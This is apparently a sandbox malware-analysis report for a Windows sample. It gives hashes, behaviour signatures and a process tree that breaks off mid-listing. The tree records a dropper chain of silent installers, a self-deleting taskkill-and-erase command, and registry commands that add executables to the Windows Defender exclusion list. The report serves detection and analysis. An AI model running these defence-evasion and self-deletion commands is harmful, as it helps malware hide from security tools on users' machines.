Analysis

  • max time kernel
    526s
  • max time network
    1273s
  • platform
    windows10-1703_x64
  • resource
    win10-20220901-en
  • resource tags

    arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
  • submitted
    07-09-2022 16:16

General

  • Target

    sample

  • Size

    1KB

  • MD5

    563ffac3b2c4488ecd24e81c655ad397

  • SHA1

    28eca35a7ebee2f546b35fff21dfe5e96923a36f

  • SHA256

    558fbd26ccbafc05c9a2b070abba157dd69b0d212b821149b056a7b98644cbad

  • SHA512

    7e969a85fbf142c82961669e31e70f1029126c879602665ae2cd10a487893e4fa0207ea1d1c6ebe360ebadf0b44f834fcaa69de78a076e7edd97b20f0e550fc5

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 31 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks for any installed AV software in registry 1 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 31 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 58 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 59 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\sample
    1⤵
      PID:3504
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe"
      1⤵
      • Enumerates system info in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:4932
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffe279b4f50,0x7ffe279b4f60,0x7ffe279b4f70
        2⤵
          PID:3356
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1632 /prefetch:2
          2⤵
            PID:3628
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1688 /prefetch:8
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:3560
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2300 /prefetch:8
            2⤵
              PID:1168
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2680 /prefetch:1
              2⤵
                PID:2228
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2664 /prefetch:1
                2⤵
                  PID:864
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1
                  2⤵
                    PID:3012
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4312 /prefetch:8
                    2⤵
                      PID:4768
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4488 /prefetch:8
                      2⤵
                        PID:4764
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4616 /prefetch:8
                        2⤵
                          PID:3776
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4392 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4468
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:8
                          2⤵
                            PID:4748
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5212 /prefetch:8
                            2⤵
                            • Suspicious behavior: EnumeratesProcesses
                            PID:4672
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4928 /prefetch:8
                            2⤵
                              PID:4684
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4840 /prefetch:8
                              2⤵
                                PID:4624
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5152 /prefetch:8
                                2⤵
                                  PID:4864
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
                                  2⤵
                                    PID:1432
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4780 /prefetch:8
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4432
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:8
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2124
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4600 /prefetch:8
                                    2⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:660
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4576 /prefetch:8
                                    2⤵
                                      PID:1528
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1608 /prefetch:8
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1592
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1
                                      2⤵
                                        PID:1216
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
                                        2⤵
                                          PID:2140
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3584 /prefetch:8
                                          2⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:328
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2808 /prefetch:1
                                          2⤵
                                            PID:188
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:1
                                            2⤵
                                              PID:2212
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=772 /prefetch:8
                                              2⤵
                                                PID:380
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2836 /prefetch:8
                                                2⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:2456
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4312 /prefetch:1
                                                2⤵
                                                  PID:2864
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5508 /prefetch:8
                                                  2⤵
                                                    PID:2728
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5636 /prefetch:8
                                                    2⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:3824
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,1529721502360385975,5499931677000317269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5260 /prefetch:8
                                                    2⤵
                                                      PID:4920
                                                  • C:\Windows\system32\taskmgr.exe
                                                    "C:\Windows\system32\taskmgr.exe" /4
                                                    1⤵
                                                    • Drops file in Windows directory
                                                    • Checks SCSI registry key(s)
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    • Suspicious use of FindShellTrayWindow
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:4768
                                                  • C:\Windows\System32\rundll32.exe
                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                    1⤵
                                                      PID:2844
                                                    • C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe
                                                      "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"
                                                      1⤵
                                                        PID:1948
                                                        • C:\Users\Admin\AppData\Local\Temp\is-GT60F.tmp\is-04BPO.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-GT60F.tmp\is-04BPO.tmp" /SL4 $50084 "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 52224
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Drops file in Program Files directory
                                                          PID:336
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            "C:\Windows\system32\schtasks.exe" /Query
                                                            3⤵
                                                              PID:3188
                                                            • C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe
                                                              "C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:3168
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 852
                                                                4⤵
                                                                • Program crash
                                                                PID:3708
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 944
                                                                4⤵
                                                                • Program crash
                                                                PID:3768
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3168 -s 256
                                                                4⤵
                                                                • Program crash
                                                                PID:96
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              "C:\Windows\system32\schtasks.exe" /Delete /F /TN "CloneRemover 3.9"
                                                              3⤵
                                                                PID:2216
                                                              • C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe
                                                                "C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe" c322aa8acb58a24b92f7268bee04d536
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Checks for any installed AV software in registry
                                                                • Modifies registry class
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2324
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 828
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:3544
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 812
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:4704
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 872
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:4688
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 976
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:4848
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1008
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:4852
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 996
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:4212
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1040
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:2064
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1184
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:4732
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1196
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:4828
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1132
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:4976
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 992
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:2388
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1588
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:3684
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1604
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:536
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1628
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:4964
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1544
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:4028
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1556
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:1896
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1564
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:1672
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1772
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:5072
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1800
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:1272
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1760
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:200
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1876
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:4308
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1904
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:2872
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1800
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:2348
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1708
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:2304
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1824
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:3724
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1928
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:4736
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1828
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:3496
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1836
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:3020
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1980
                                                                  4⤵
                                                                  • Program crash
                                                                  PID:1464
                                                                • C:\Users\Admin\AppData\Local\Temp\SwkT9WcS\OAYk2.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\SwkT9WcS\OAYk2.exe /silentmix SUB=c322aa8acb58a24b92f7268bee04d536
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  PID:1216
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-29MCC.tmp\is-5Q7I8.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-29MCC.tmp\is-5Q7I8.tmp" /SL4 $50232 "C:\Users\Admin\AppData\Local\Temp\SwkT9WcS\OAYk2.exe" 804864 52736 /silentmix SUB=c322aa8acb58a24b92f7268bee04d536
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Drops file in Program Files directory
                                                                    PID:4628
                                                                    • C:\Program Files (x86)\Floppy Disk Master\fdm-11.exe
                                                                      "C:\Program Files (x86)\Floppy Disk Master\fdm-11.exe" /silentmix SUB=c322aa8acb58a24b92f7268bee04d536
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:4396
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "fdm-11.exe" /f & erase "C:\Program Files (x86)\Floppy Disk Master\fdm-11.exe" & exit
                                                                        7⤵
                                                                          PID:3516
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /im "fdm-11.exe" /f
                                                                            8⤵
                                                                            • Kills process with taskkill
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2296
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 2032
                                                                    4⤵
                                                                    • Program crash
                                                                    PID:1832
                                                                  • C:\Users\Admin\AppData\Local\Temp\hX7jUOlZ\I7cRaV.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\hX7jUOlZ\I7cRaV.exe
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    PID:764
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-BLAUO.tmp\is-A0L88.tmp
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-BLAUO.tmp\is-A0L88.tmp" /SL4 $702DA "C:\Users\Admin\AppData\Local\Temp\hX7jUOlZ\I7cRaV.exe" 941720 52736
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:1512
                                                                      • C:\Program Files (x86)\Exfa A. Ronip\SMART_Assistant\SMARTAssistant.exe
                                                                        "C:\Program Files (x86)\Exfa A. Ronip\SMART_Assistant\SMARTAssistant.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:3092
                                                                  • C:\Users\Admin\AppData\Local\Temp\nq6YpvzU\tmWQ1yAGoEVPHDWNpKH2.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\nq6YpvzU\tmWQ1yAGoEVPHDWNpKH2.exe /S /site_id=757674
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    PID:3628
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4A7C.tmp\Install.exe
                                                                      .\Install.exe /S /site_id=757674
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:208
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS5E91.tmp\Install.exe
                                                                        .\Install.exe /S /site_id "757674" /S /site_id=757674
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Checks BIOS information in registry
                                                                        • Drops file in System32 directory
                                                                        • Enumerates system info in registry
                                                                        PID:524
                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                          7⤵
                                                                            PID:2748
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                              8⤵
                                                                                PID:4440
                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                  9⤵
                                                                                    PID:4540
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
